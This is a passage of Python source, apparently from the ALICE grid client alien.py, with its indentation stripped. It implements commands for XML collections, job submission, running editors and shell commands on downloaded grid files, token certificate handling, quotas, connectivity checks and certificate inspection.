if filelist_content_list[0].startswith('alien:'):
return RET(1, '', 'Local filelists should contain only local files (not alien: lfns)')
xml_coll = mk_xml_local(filelist_content_list)
if output_file:
if output_file.startswith('alien:'):
return RET(1, '', 'For the moment upload the resulting file by hand in grid')
output_file = lfn_prefix_re.sub('', output_file)
try:
with open(output_file, 'w') as f: f.write(xml_coll)
return RET(0)
except Exception as e:
logging.exception(e)
return RET(1, '', f'Error writing {output_file}')
else:
return RET(0, xml_coll)
else:
grid_args = []
if ignore_missing: grid_args.append('-i')
if do_append: grid_args.append('-a')
if lfn_filelist: grid_args.extend(['-l', lfn_filelist])
if output_file and not output_file.startswith("file:"): grid_args.extend(['-x', lfn_prefix_re.sub('', output_file)])
ret_obj = SendMsg(wb, 'toXml', grid_args)
if output_file and output_file.startswith("file:"):
output_file = lfn_prefix_re.sub('', output_file)
try:
with open(output_file, 'w') as f: f.write(ret_obj.out)
return RET(0)
except Exception as e:
logging.exception(e)
return RET(1, '', f'Error writing {output_file}')
return ret_obj
return RET(1, '', 'Allegedly unreachable point in DO_2xml. If you see this, contact developer!')
else:
lfn_arg_list = args.copy() # the rest of arguments are lfns
if is_local:
lfn_list_obj_list = [file2file_dict(filepath) for filepath in lfn_arg_list]
if not lfn_list_obj_list: return RET(1, '', f'Invalid list of files: {lfn_arg_list}')
lfn_list = [get_lfn_key(lfn_obj) for lfn_obj in lfn_list_obj_list]
xml_coll = mk_xml_local(lfn_list)
if output_file:
if output_file.startswith('alien:'):
return RET(1, '', 'For the moment upload the resulting file by hand in grid')
output_file = lfn_prefix_re.sub('', output_file)
with open(output_file, 'w') as f: f.write(xml_coll)
return RET(0)
else:
return RET(0, xml_coll)
else:
grid_args = []
if ignore_missing: grid_args.append('-i')
if do_append: grid_args.append('-a')
if output_file and not output_file.startswith("file:"): grid_args.extend(['-x', lfn_prefix_re.sub('', output_file)])
grid_args.extend(lfn_arg_list)
ret_obj = SendMsg(wb, 'toXml', grid_args)
if output_file and output_file.startswith("file:"):
output_file = lfn_prefix_re.sub('', output_file)
try:
with open(output_file, 'w') as f: f.write(ret_obj.out)
return RET(0)
except Exception as e:
logging.exception(e)
return RET(1, '', f'Error writing {output_file}')
return ret_obj
return RET(1, '', 'Allegedly unreachable point in DO_2xml. If you see this, contact developer!')
def DO_queryML(args: Union[list, None] = None) -> RET:
"""submit: process submit commands for local jdl cases"""
global AlienSessionInfo
if args is None: args = []
if is_help(args):
msg_help = ('usage: queryML <ML node>\n'
'time range can be specified for a parameter:\n'
'/[starting time spec]/[ending time spec]/parameter\n'
'where the two time specs can be given in absolute epoch timestamp (in milliseconds), as positive values,\n'
'or relative timestamp to `now`, when they are negative.\nFor example `-60000` would be "1 minute ago" and effectively `-1` means "now".')
return RET(0, msg_help)
types = ('text', 'xml', 'json')
if any(type in types for arg in args): args.remove(type)
args.append('json')
ansraw = queryML(args)
ans2dict = json.loads(ansraw)
ans_list = ans2dict["results"]
if len(ans_list) == 0:
return RET(AlienSessionInfo['exitcode'], "", "queryML:: Empty answer")
if 'Timestamp' in ans_list[0]:
for item in ans_list: item['Timestamp'] = unixtime2local(item['Timestamp'])
# all elements will have the same key names
# n_columns = len(ans_list[0])
keys = ans_list[0].keys()
# establish keys width
max_value_size = [len(key) for key in keys]
for row in ans_list:
for idx, key in enumerate(keys):
max_value_size[idx] = max(max_value_size[idx], len(str(row.get(key))))
max_value_size[:] = [w + 3 for w in max_value_size]
# create width specification list
row_format_list = [f'{{: <{str(w)}}}' for w in max_value_size]
row_format = "".join(row_format_list)
msg = row_format.format(*keys)
for row in ans_list:
value_list = [row.get(key) for key in keys]
msg = f'{msg}\n{row_format.format(*value_list)}'
return RET(AlienSessionInfo['exitcode'], msg, "")
def DO_submit(wb, args: Union[list, None] = None) -> RET:
"""submit: process submit commands for local jdl cases"""
if not args or args is None: args = ['-h']
if is_help(args): return get_help_srv(wb, 'submit')
if args[0].startswith("file:"):
msg = ("Specifications as where to upload the jdl to be submitted and with what parameters are not yet defined"
"Upload first the jdl to a suitable location (with a safe number of replicas) and then submit")
return RET(0, msg)
args[0] = expand_path_grid(wb, args[0])
return SendMsg(wb, 'submit', args)
def DO_ps(wb, args: Union[list, None] = None) -> RET:
"""ps : show and process ps output"""
if args is None: args = []
ret_obj = SendMsg(wb, 'ps', args)
if '-trace' in args:
nice_lines = [convert_time(str(msgline)) for item in ret_obj.ansdict['results'] for msgline in item['message'].split('\n')]
return ret_obj._replace(out = '\n'.join(nice_lines))
return ret_obj
def DO_cat(wb, args: Union[list, None] = None) -> RET:
"""cat lfn :: apply cat on a downloaded lfn as a temporary file"""
args.insert(0, '-noout') # keep app open, do not terminate
args.insert(0, 'cat')
return DO_run(wb, args, external = True)
def DO_less(wb, args: Union[list, None] = None) -> RET:
"""less lfn :: apply less on a downloaded lfn as a temporary file"""
args.insert(0, '-noout') # keep app open, do not terminate
args.insert(0, 'less')
return DO_run(wb, args, external = True)
def DO_more(wb, args: Union[list, None] = None) -> RET:
"""more lfn :: apply more on a downloaded lfn as a temporary file"""
args.insert(0, '-noout') # keep app open, do not terminate
args.insert(0, 'more')
return DO_run(wb, args, external = True)
def DO_pfn(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
if is_help(args):
msg = 'Command format : pfn [lfn]\nIt will print only the list of associtated pfns (simplified form of whereis)'
return RET(0, msg)
cmd = 'whereis'
args.insert(0, '-r')
ret_obj = SendMsg(wb, cmd, args, opts = 'nomsg')
msg = '\n'.join(str(item['pfn']) for item in ret_obj.ansdict['results'] if 'pfn' in item).strip()
return ret_obj._replace(out = msg)
def DO_lfn2uri(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
if is_help(args):
msg = '''Command format : lfn2uri <lfn> <local_file?> [meta] [write|upload] [strict] [http]
It will print the URIs for lfn replicas
local_file : required only for write|upload URIs
meta : will write in current directory the metafile and will return the string to be used with xrdcp
write|upload : request tokens for writing/upload; incompatible with <meta> argument
strict : lfn specifications will be considered to be strict
http : URIs will be for http end-points of enabled SEs
'''
return RET(0, msg)
write_meta = get_arg(args, 'meta')
strictspec = get_arg(args, 'strict')
httpurl = get_arg(args, 'http')
isWrite = get_arg(args, 'upload')
if not isWrite: isWrite = get_arg(args, 'write')
if isWrite and write_meta:
return RET(1, '', 'meta argument is incompatible with uploading')
if isWrite and len(args) < 2: return RET(1, '', 'for upload URIs two elements are required: lfn local_file')
if len(args) < 1: return RET(1, '', 'at least one argument is neeeded: lfn')
local_file = ''
if len(args) > 1: local_file = args[1]
lfn = args[0]
lfn_components = specs_split.split(lfn, maxsplit = 1) # NO comma allowed in grid names (hopefully)
lfn = lfn_components[0] # first item is the file path, let's remove it; it remains disk specifications
if not isWrite: lfn = expand_path_grid(wb, lfn)
specs = ''
if len(lfn_components) > 1: specs = lfn_components[1]
if write_meta:
out = lfn2meta(wb, lfn, local_file, specs, isWrite, strictspec, httpurl)
else:
out = lfn2uri(wb, lfn, local_file, specs, isWrite, strictspec, httpurl)
if not out:
return RET(1, '', f'Could not not create URIs for: {lfn}')
return RET(0, out)
def token(wb, args: Union[None, list] = None) -> int:
"""(Re)create the tokencert and tokenkey files"""
if not wb: return 1
if not args: args = []
global AlienSessionInfo
tokencert, tokenkey = get_token_names(True)
ret_obj = SendMsg(wb, 'token', args, opts = 'nomsg')
if ret_obj.exitcode != 0: return retf_print(ret_obj)
tokencert_content = ret_obj.ansdict.get('results')[0].get('tokencert', '')
tokenkey_content = ret_obj.ansdict.get('results')[0].get('tokenkey', '')
if not tokencert_content or not tokenkey_content: return int(1)
if os.path.isfile(tokencert):
os.chmod(tokencert, 0o600) # make it writeable
os.remove(tokencert)
with open(tokencert, "w") as tcert: print(f"{tokencert_content}", file=tcert) # write the tokencert
os.chmod(tokencert, 0o400) # make it readonly
if os.path.isfile(tokenkey):
os.chmod(tokenkey, 0o600) # make it writeable
os.remove(tokenkey)
with open(tokenkey, "w") as tkey: print(f"{tokenkey_content}", file=tkey) # write the tokenkey
os.chmod(tokenkey, 0o400) # make it readonly
return ret_obj.exitcode
def token_regen(wb, args: Union[None, list] = None):
global AlienSessionInfo
if not AlienSessionInfo['use_usercert']:
wb_close(wb, code = 1000, reason = 'Lets connect with usercert to be able to generate token')
try:
wb = InitConnection(use_usercert = True) # we have to reconnect with the new token
except Exception:
logging.debug(traceback.format_exc())
# now we are connected with usercert, so we can generate token
if token(wb, args) != 0: return wb
# we have to reconnect with the new token
wb_close(wb, code = 1000, reason = 'Re-initialize the connection with the new token')
try:
AlienSessionInfo['use_usercert'] = False
wb = InitConnection()
except Exception:
logging.debug(traceback.format_exc())
return wb
def DO_token(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
msg = "Print only command!!! Use >token-init< for token (re)generation, see below the arguments\n"
ret_obj = SendMsg(wb, 'token', args, opts = 'nokeys')
return ret_obj._replace(out = f'{msg}{ret_obj.out}')
def DO_token_init(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
if len(args) > 0 and is_help(args):
ret_obj = SendMsg(wb, 'token', ['-h'], opts = 'nokeys')
return ret_obj._replace(out = ret_obj.out.replace('usage: token', 'INFO: token is automatically created, use this for token customization\nusage: token-init'))
wb = token_regen(wb, args)
tokencert, tokenkey = get_token_names()
return CertInfo(tokencert)
def DO_edit(wb, args: Union[list, None] = None, editor: str = '') -> RET:
"""Edit a grid lfn; download a temporary, edit with the specified editor and upload the new file"""
if not args or args is None: args = ['-h']
if is_help(args):
msg = """Command format: edit lfn\nAfter editor termination the file will be uploaded if md5 differs
-datebck : the backup filename will be date based
N.B. EDITOR env var must be set or fallback will be mcedit (not checking if exists)"""
return RET(0, msg)
if not editor:
editor = os.getenv('EDITOR')
if not editor:
print_out('EDITOR env variable not set, we will fallback to mcedit (no check if exists)')
editor = 'mcedit -u'
versioned_backup = False
if get_arg(args, '-datebck'): versioned_backup = True
lfn = expand_path_grid(wb, args[-1]) # assume that the last argument is the lfn
# check for valid (single) specifications delimiter
count_tokens = collections.Counter(lfn)
if count_tokens[','] + count_tokens['@'] > 1:
msg = f"At most one of >,< or >@< tokens used for copy specification can be present in the argument. The offender is: {''.join(count_tokens)}"
return RET(64, '', msg) # EX_USAGE /* command line usage error */
specs = specs_split.split(lfn, maxsplit = 1) # NO comma allowed in grid names (hopefully)
lfn = specs.pop(0) # first item is the file path, let's remove it; it remains disk specifications
tmp = download_tmp(wb, lfn)
if tmp and os.path.isfile(tmp):
md5_begin = md5(tmp)
ret_obj = runShellCMD(f'{editor} {tmp}', captureout = False)
if ret_obj.exitcode != 0: return ret_obj
md5_end = md5(tmp)
if md5_begin != md5_end:
uploaded_file = upload_tmp(wb, tmp, ','.join(specs), dated_backup = versioned_backup)
os.remove(tmp) # clean up the temporary file not matter if the upload was succesful or not
return RET(0, f'Uploaded {uploaded_file}') if uploaded_file else RET(1, '', f'Error uploading {uploaded_file}')
return RET(0)
return RET(1, '', f'Error downloading {lfn}, editing could not be done.')
def DO_mcedit(wb, args: Union[list, None] = None) -> RET: return DO_edit(wb, args, editor = 'mcedit')
def DO_vi(wb, args: Union[list, None] = None) -> RET: return DO_edit(wb, args, editor = 'vi')
def DO_vim(wb, args: Union[list, None] = None) -> RET: return DO_edit(wb, args, editor = 'vim')
def DO_nano(wb, args: Union[list, None] = None) -> RET: return DO_edit(wb, args, editor = 'nano')
def DO_run(wb, args: Union[list, None] = None, external: bool = False) -> RET:
"""run shell_command lfn|alien: tagged lfns :: download lfn(s) as a temporary file and run shell command on the lfn(s)"""
if args is None: args = []
if not args: return RET(1, '', 'No shell command specified')
if is_help(args) or len(args) == 1:
msg_last = ('Command format: shell_command arguments lfn\n'
'N.B.!! the lfn must be the last element of the command!!\n'
'N.B.! The output and error streams will be captured and printed at the end of execution!\n'
'for working within application use <edit> or -noout argument\n'
'additiona arguments recognized independent of the shell command:\n'
'-force : will re-download the lfn even if already present\n'
'-noout : will not capture output, the actual application can be used')
if external:
ret_obj = runShellCMD(f'{args[0]} -h', captureout = True, do_shell = True)
return ret_obj._replace(out = f'{ret_obj.out}\n{msg_last}')
msg = ('Command format: run shell_command arguments lfn\n'
'the lfn must be the last element of the command\n'
'N.B.! The output and error streams will be captured and printed at the end of execution!\n'
'for working within application use <edit>\n'
'additiona arguments recognized independent of the shell command:\n'
'-force : will re-download the lfn even if already present\n'
'-noout : will not capture output, the actual application can be used')
return RET(0, msg)
overwrite = get_arg(args, '-force')
capture_out = get_arg(args, '-noout')
list_of_lfns = [arg for arg in args if 'alien:' in arg]
if not list_of_lfns: list_of_lfns = [args.pop(-1)]
tmp_list = [download_tmp(wb, lfn, overwrite) for lfn in list_of_lfns] # list of temporary downloads
new_args = [arg for arg in args if arg not in list_of_lfns] # command arguments without the files
args = list(new_args)
cmd = " ".join(args)
files = " ".join(tmp_list)
if tmp_list and all(os.path.isfile(tmp) for tmp in tmp_list):
return runShellCMD(f'{cmd} {files}', capture_out, do_shell = True)
return RET(1, '', f'There was an error downloading the following files:\n{chr(10).join(tmp_list)}')
def DO_exec(wb, args: Union[list, None] = None) -> RET:
"""exec lfn :: download lfn as a temporary file and executed in the shell"""
if args is None: args = []
if not args or is_help(args):
msg = ('Command format: exec lfn list_of_arguments\n'
'N.B.! The output and error streams will be captured and printed at the end of execution!\n'
'for working within application use <edit>')
return RET(0, msg)
overwrite = get_arg(args, '-force')
capture_out = get_arg(args, '-noout')
lfn = args.pop(0) # the script to be executed
opt_args = " ".join(args)
tmp = download_tmp(wb, lfn, overwrite)
if tmp and os.path.isfile(tmp):
os.chmod(tmp, 0o700)
return runShellCMD(f'{tmp} {opt_args}' if opt_args else tmp, capture_out)
return RET(1, '', f'There was an error downloading script: {lfn}')
def DO_syscmd(wb, cmd: str = '', args: Union[None, list, str] = None) -> RET:
"""run system command with all the arguments but all alien: specifications are downloaded to temporaries"""
global AlienSessionInfo
if args is None: args = []
if isinstance(args, str): args = args.split()
if not cmd: return RET(1, '', 'No system command specified!')
new_arg_list = [download_tmp(wb, arg) if arg.startswith('alien:') else arg for arg in args]
new_arg_list.index(0, cmd)
return runShellCMD(' '.join(new_arg_list), captureout = True, do_shell = True)
def DO_find2(wb, args: list) -> RET:
if args is None: args = []
if is_help(args):
msg_client = (f'''Client-side implementation of find, it contain the following helpers.
Command formant: find2 <options> <directory>
-select <pattern> : select only these files; {PrintColor(COLORS.BIGreen)}N.B. this is a REGEX applied to full path!!!{PrintColor(COLORS.ColorReset)} defaults to all ".*"
-name <pattern> : select only these files; {PrintColor(COLORS.BIGreen)}N.B. this is a REGEX applied to a directory or file name!!!{PrintColor(COLORS.ColorReset)} defaults to all ".*"
-name <verb>_string : where verb = begin|contain|ends|ext and string is the text selection criteria. verbs are aditive e.g.:
-name begin_myf_contain_run1_ends_bla_ext_root
{PrintColor(COLORS.BIRed)}N.B. the text to be filtered cannont have underline <_> within!!!{PrintColor(COLORS.ColorReset)}\n
The server options:''')
srv_answ = get_help_srv(wb, 'find')
msg_srv = srv_answ.out
return RET(0, f'{msg_client}\n{msg_srv}')
find_args = ['-a', '-s']
get_arg(args, '-a')
get_arg(args, '-s')
if get_arg(args, '-v'): print_out("Verbose mode not implemented, ignored")
pattern = '*'
pattern_regex = None
use_regex = False
filtering_enabled = False
glob_arg = get_arg_value(args, '-glob')
if glob_arg:
pattern = glob_arg
use_regex = False
filtering_enabled = True
select_arg = get_arg_value(args, '-select')
if select_arg:
if filtering_enabled:
msg = "Only one rule of selection can be used, either -select (full path match), -name (match on file name) or -glob (globbing)"
return RET(22, '', msg) # EINVAL /* Invalid argument */
pattern_regex = select_arg
use_regex = True
filtering_enabled = True
name_arg = get_arg_value(args, '-name')
if name_arg:
if filtering_enabled:
msg = "Only one rule of selection can be used, either -select (full path match), -name (match on file name) or -glob (globbing)"
return RET(22, '', msg) # EINVAL /* Invalid argument */
pattern_regex_arg = name_arg
use_regex = True
filtering_enabled = True
pattern_regex = name2regex(pattern_regex_arg)
if use_regex and not pattern_regex:
msg = ("No selection verbs were recognized!"
"usage format is -name <attribute>_<string> where attribute is one of: begin, contain, ends, ext"
f"The invalid pattern was: {pattern_regex_arg}")
return RET(22, '', msg) # EINVAL /* Invalid argument */
if use_regex:
find_args.insert(0, '-r')
pattern = pattern_regex
start_location = args[-1] if filtering_enabled else args[-2]
find_args.append(expand_path_grid(wb, start_location))
find_args.append(pattern)
return SendMsg(wb, 'find', find_args, opts = 'nokeys')
def runShellCMD(INPUT: str = '', captureout: bool = True, do_shell: bool = False, timeout: Union[str, int, None] = None) -> RET:
"""Run shell command in subprocess; if exists, print stdout and stderr"""
if not INPUT: return RET(1, '', 'No command to be run provided')
sh_cmd = re.sub(r'^!', '', INPUT)
args = sh_cmd if do_shell else shlex.split(sh_cmd)
capture_args = {'stdout': subprocess.PIPE, 'stderr': subprocess.PIPE} if captureout else {}
status = exitcode = except_msg = None
msg_out = msg_err = ''
try:
status = subprocess.run(args, encoding = 'utf-8', errors = 'replace', shell = do_shell, **capture_args) # pylint: disable=subprocess-run-check
except subprocess.TimeoutExpired:
print_err(f"Expired timeout: {timeout} for: {sh_cmd}")
exitcode = int(62)
except FileNotFoundError:
print_err(f"Command not found: {sh_cmd}")
exitcode = int(2)
except Exception as e:
ex_type, ex_value, ex_traceback = sys.exc_info()
except_msg = f'Exception:: {ex_type} -> {ex_value}\n{ex_traceback}\n'
exitcode = int(1)
if status:
if status.stdout: msg_out = status.stdout.strip()
if status.stderr: msg_err = status.stderr.strip()
exitcode = status.returncode
if except_msg: msg_err = f'{except_msg}{msg_err}'
return RET(exitcode, msg_out, msg_err)
def DO_quota(wb, args: Union[None, list] = None) -> RET:
"""quota : put togheter both job and file quota"""
if not args: args = []
if is_help(args):
msg = ('Client-side implementation that make use of server\'s jquota and fquota (hidden by this implementation)\n'
'Command format: quota [user]\n'
'if [user] is not provided, it will be assumed the current user')
return RET(0, msg)
user = AlienSessionInfo['user']
if len(args) > 0:
if args[0] != "set": # we asume that if 'set' is not used then the argument is a username
user = args[0]
else:
msg = '>set< functionality not implemented yet'
return RET(0, msg)
jquota_out = SendMsg(wb, f'jquota -nomsg list {user}')
jquota_dict = jquota_out.ansdict
fquota_out = SendMsg(wb, f'fquota -nomsg list {user}')
fquota_dict = fquota_out.ansdict
username = jquota_dict['results'][0]["username"]
running_time = float(jquota_dict['results'][0]["totalRunningTimeLast24h"])/3600
running_time_max = float(jquota_dict['results'][0]["maxTotalRunningTime"])/3600
running_time_perc = (running_time/running_time_max)*100
cpucost = float(jquota_dict['results'][0]["totalCpuCostLast24h"])/3600
cpucost_max = float(jquota_dict['results'][0]["maxTotalCpuCost"])/3600
cpucost_perc = (cpucost/cpucost_max)*100
unfinishedjobs_max = int(jquota_dict['results'][0]["maxUnfinishedJobs"])
waiting = int(jquota_dict['results'][0]["waiting"])
running = int(jquota_dict['results'][0]["running"])
unfinishedjobs_perc = ((waiting + running)/unfinishedjobs_max)*100
pjobs_nominal = int(jquota_dict['results'][0]["nominalparallelJobs"])
pjobs_max = int(jquota_dict['results'][0]["maxparallelJobs"])
size = float(fquota_dict['results'][0]["totalSize"])
size_MiB = size/(1024*1024)
size_max = float(fquota_dict['results'][0]["maxTotalSize"])
size_max_MiB = size_max/(1024*1024)
size_perc = (size/size_max)*100
files = float(fquota_dict['results'][0]["nbFiles"])
files_max = float(fquota_dict['results'][0]["maxNbFiles"])
files_perc = (files/files_max)*100
msg = (f"""Quota report for user : {username}
Unfinished jobs(R + W / Max):\t\t{running} + {waiting} / {unfinishedjobs_max} --> {unfinishedjobs_perc:.2f}% used
Running time (last 24h) used/max:\t{running_time:.2f}/{running_time_max:.2f}(h) --> {running_time_perc:.2f}% used
CPU Cost (last 24h) used/max:\t\t{cpucost:.2f}/{cpucost_max:.2f}(h) --> {cpucost_perc:.2f}% used
ParallelJobs (nominal/max) :\t{pjobs_nominal}/{pjobs_max}
Storage size :\t\t\t{size_MiB:.2f}/{size_max_MiB:.2f} MiB --> {size_perc:.2f}%
Number of files :\t\t{files}/{files_max} --> {files_perc:.2f}%""")
return RET(0, msg)
def check_ip_port(socket_object: tuple) -> bool:
"""Check connectivity to an address, port; adress should be the tuple given by getaddrinfo"""
if not socket_object: return False
is_open = False
# socket_object = (family, type, proto, canonname, sockaddr)
with socket.socket(socket_object[0],socket_object[1],socket_object[2]) as s: # Create a TCP socket
s.settimeout(2) # timeout 2s
try:
s.connect(socket_object[4])
is_open = True
except Exception as e:
pass
return is_open
def check_port(address: str, port: Union[str, int]) -> list:
"""Check TCP connection to fqdn:port"""
ip_list = socket.getaddrinfo(address, int(port), proto = socket.IPPROTO_TCP)
return [(*sock_obj[-1], check_ip_port(sock_obj)) for sock_obj in ip_list]
def isReachable(address: str = 'alice-jcentral.cern.ch', port: Union[str, int] = 8097) -> bool:
result_list = check_port(address, port)
for ip in result_list:
if ip[-1]: return True
return False
def DO_checkAddr(args: Union[list, None] = None) -> RET:
global AlienSessionInfo
if is_help(args):
msg = ('checkAddr [reference] fqdn/ip port\n'
'defaults are: alice-jcentral.cern.ch 8097\n'
'reference arg will check connection to google dns and www.cern.ch')
return RET(0, msg)
result_list = []
if get_arg(args, 'reference'):
result_list.extend(check_port('8.8.8.8', 53))
result_list.extend(check_port('2001:4860:4860::8888', 53))
result_list.extend(check_port('www.cern.ch', 80))
addr = args[0] if args else 'alice-jcentral.cern.ch'
port = args[1] if (args and len(args) > 1) else 8097
result_list.extend(check_port(addr, port))
stdout = ''
for res in result_list:
stdout += f'{res[0]}:{res[1]} {PrintColor(COLORS.BIGreen) + "OK" if res[-1] else PrintColor(COLORS.BIRed) + "FAIL"}{PrintColor(COLORS.ColorReset)}\n'
return RET(0, stdout)
def get_help(wb, cmd: str = '') -> RET:
"""Return the help option even for client-side commands"""
if not cmd: return RET(1, '', 'No command specified for help')
return ProcessInput(wb, cmd, ['-h'])
def get_help_srv(wb, cmd: str = '') -> RET:
"""Return the help option for server-side known commands"""
if not cmd: return RET(1, '', 'No command specified for help request')
return SendMsg(wb, f'{cmd} -h')
def DO_help(wb, args: Union[list, None] = None) -> RET:
global AlienSessionInfo
if args is None: args = []
if not args:
msg = ('Project documentation can be found at:\n'
'https://jalien.docs.cern.ch/\n'
'https://gitlab.cern.ch/jalien/xjalienfs/blob/master/README.md\n'
'the following commands are available:')
nr = len(AlienSessionInfo['commandlist'])
column_width = 24
try:
columns = os.get_terminal_size()[0]//column_width
except Exception:
columns = 5
for ln in range(0, nr, columns):
if ln + 1 > nr: ln = nr - 1
el_ln = AlienSessionInfo['commandlist'][ln:ln + columns]
ln = [str(i).ljust(column_width) for i in el_ln]
msg = f'{msg}\n{"".join(ln)}'
return RET(0, msg)
return get_help(wb, args.pop(0))
def DO_user(wb, args: Union[list, None] = None) -> RET:
global AlienSessionInfo
if args is None: args = []
ret_obj = SendMsg(wb, 'user', args)
if ret_obj.exitcode == 0 and 'homedir' in ret_obj.ansdict['results'][0]: AlienSessionInfo['alienHome'] = ret_obj.ansdict['results'][0]['homedir']
return ret_obj
def DO_prompt(args: Union[list, None] = None) -> RET:
"""Add local dir and date information to the alien.py shell prompt"""
global AlienSessionInfo
if args is None: args = []
if not args or is_help(args):
msg = "Toggle the following in the command prompt : <date> for date information and <pwd> for local directory"
return RET(0, msg)
if 'date' in args: AlienSessionInfo['show_date'] = (not AlienSessionInfo['show_date'])
if 'pwd' in args: AlienSessionInfo['show_lpwd'] = (not AlienSessionInfo['show_lpwd'])
return RET(0)
def get_list_entries(wb, lfn, fullpath: bool = False) -> list:
"""return a list of entries of the lfn argument, full paths if 2nd arg is True"""
key = 'path' if fullpath else 'name'
ret_obj = SendMsg(wb, 'ls', ['-nomsg', '-a', '-F', os.path.normpath(lfn)])
return list(item[key] for item in ret_obj.ansdict['results']) if ret_obj.exitcode == 0 else []
def lfn_list(wb, lfn: str = ''):
"""Completer function : for a given lfn return all options for latest leaf"""
if not wb: return []
if not lfn: lfn = '.' # AlienSessionInfo['currentdir']
list_lfns = []
lfn_path = Path(lfn)
base_dir = '/' if lfn_path.parent.as_posix() == '/' else f'{lfn_path.parent.as_posix()}/'
name = f'{lfn_path.name}/' if lfn.endswith('/') else lfn_path.name
def item_format(base_dir, name, item):
# print_out(f'\nbase_dir: {base_dir} ; name: {name} ; item: {item}')
if name.endswith('/') and name != '/':
return f'{name}{item}' if base_dir == './' else f'{base_dir}{name}{item}'
return item if base_dir == './' else f'{base_dir}{item}'
if lfn.endswith('/'):
listing = get_list_entries(wb, lfn)
list_lfns = [item_format(base_dir, name, item) for item in listing]
else:
listing = get_list_entries(wb, base_dir)
list_lfns = [item_format(base_dir, name, item) for item in listing if item.startswith(name)]
# print_out(f'\n{list_lfns}\n')
return list_lfns
def wb_ping(wb) -> float:
"""Websocket ping function, it will return rtt in ms"""
init_delta = float(-999.0)
init_begin = datetime.datetime.now().timestamp()
if IsWbConnected(wb):
init_end = datetime.datetime.now().timestamp()
init_delta = float((init_end - init_begin) * 1000)
return init_delta
return float(-1)
def DO_ping(wb, args: Union[list, None] = None) -> RET:
"""Command implementation for ping functionality"""
if args is None: args = []
if is_help(args): return RET(0, "ping <count>\nwhere count is integer")
if len(args) > 0 and args[0].isdigit():
count = int(args[0])
elif not args:
count = int(3)
else:
return RET(1, '', 'Unrecognized argument, it should be int type')
results = []
for i in range(count):
p = wb_ping(wb)
results.append(p)
rtt_min = min(results)
rtt_max = max(results)
rtt_avg = statistics.mean(results)
rtt_stddev = statistics.stdev(results) if len(results) > 1 else 0.0
endpoint = wb.remote_address[0]
msg = (f"Websocket ping/pong(s) : {count} time(s) to {endpoint}\nrtt min/avg/max/mdev (ms) = {rtt_min:.3f}/{rtt_avg:.3f}/{rtt_max:.3f}/{rtt_stddev:.3f}")
return RET(0, msg)
def get_files_cert() -> list:
return (os.getenv('X509_USER_CERT', f'{Path.home().as_posix()}/.globus/usercert.pem'), os.getenv('X509_USER_KEY', f'{Path.home().as_posix()}/.globus/userkey.pem'))
def get_token_names(files: bool = False) -> tuple:
if files:
return (f'{_TMPDIR}/tokencert_{str(os.getuid())}.pem', f'{_TMPDIR}/tokenkey_{str(os.getuid())}.pem')
else:
return os.getenv('JALIEN_TOKEN_CERT', f'{_TMPDIR}/tokencert_{str(os.getuid())}.pem'), os.getenv('JALIEN_TOKEN_KEY', f'{_TMPDIR}/tokenkey_{str(os.getuid())}.pem')
def DO_tokendestroy(args: Union[list, None] = None) -> RET:
if args is None: args = []
if len(args) > 0 and is_help(args): return RET(0, "Delete the token{cert,key}.pem files")
tokencert, tokenkey = get_token_names()
if os.path.exists(tokencert): os.remove(tokencert)
if os.path.exists(tokenkey): os.remove(tokenkey)
return RET(0, "Token was destroyed! Re-connect for token re-creation.")
def IsValidCert(fname: str):
"""Check if the certificate file (argument) is present and valid. It will return false also for less than 5min of validity"""
try:
with open(fname) as f:
cert_bytes = f.read()
except Exception:
return False
try:
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_bytes)
except Exception:
return False
x509_notafter = x509.get_notAfter()
utc_time = datetime.datetime.strptime(x509_notafter.decode("utf-8"), "%Y%m%d%H%M%SZ")
time_notafter = int((utc_time - datetime.datetime(1970, 1, 1)).total_seconds())
time_current = int(datetime.datetime.now().timestamp())
time_remaining = time_notafter - time_current
return time_remaining > 300
def CertInfo(fname: str) -> RET:
"""Print certificate information (subject, issuer, notbefore, notafter)"""
try:
with open(fname) as f:
cert_bytes = f.read()
except Exception:
return RET(2, "", f"File >>>{fname}<<< not found") # ENOENT /* No such file or directory */
try:
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_bytes)
except Exception:
return RET(5, "", f"Could not load certificate >>>{fname}<<<") # EIO /* I/O error */
utc_time_notafter = datetime.datetime.strptime(x509.get_notAfter().decode("utf-8"), "%Y%m%d%H%M%SZ")
utc_time_notbefore = datetime.datetime.strptime(x509.get_notBefore().decode("utf-8"), "%Y%m%d%H%M%SZ")
issuer = '/%s' % ('/'.join(['%s=%s' % (k.decode("utf-8"), v.decode("utf-8")) for k, v in x509.get_issuer().get_components()]))
subject = '/%s' % ('/'.join(['%s=%s' % (k.decode("utf-8"), v.decode("utf-8")) for k, v in x509.get_subject().get_components()]))
info = f"DN >>> {subject}\nISSUER >>> {issuer}\nBEGIN >>> {utc_time_notbefore}\nEXPIRE >>> {utc_time_notafter}"
return RET(0, info)
def DO_certinfo(args: Union[list, None] = None) -> RET:
if args is None: args = []
cert, key = get_files_cert()
if len(args) > 0 and is_help(args): return RET(0, "Print user certificate information", "")
return CertInfo(cert)
def DO_tokeninfo(args: Union[list, None] = None) -> RET:
if not args: args = []
if len(args) > 0 and is_help(args): return RET(0, "Print token certificate information", "")
tokencert, tokenkey = get_token_filenames()
return CertInfo(tokencert)
def CertVerify(fname: str) -> RET:
"""Print certificate information (subject, issuer, notbefore, notafter)"""
try:
with open(fname) as f:
cert_bytes = f.read()
except Exception:
return RET(2, "", f"File >>>{fname}<<< not found") # ENOENT /* No such file or directory */
try:
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_bytes)
except Exception:
logging.debug(traceback.format_exc())
return RET(5, "", f"Could not load certificate >>>{fname}<<<") # EIO /* I/O error */
x509store = OpenSSL.crypto.X509Store()
x509store.set_flags(OpenSSL.crypto.X509StoreFlags.ALLOW_PROXY_CERTS)
ca_verify_location = get_ca_path()
try:
if os.path.isfile(ca_verify_location):
x509store.load_locations(cafile = ca_verify_location)
else:
x509store.load_locations(None, capath = ca_verify_location)
except Exception:
logging.debug(traceback.format_exc())
return RET(5, "", f"Could not load verify location >>>{ca_verify_location}<<<") # EIO /* I/O error */
store_ctx = OpenSSL.crypto.X509StoreContext(x509store, x509)
try:
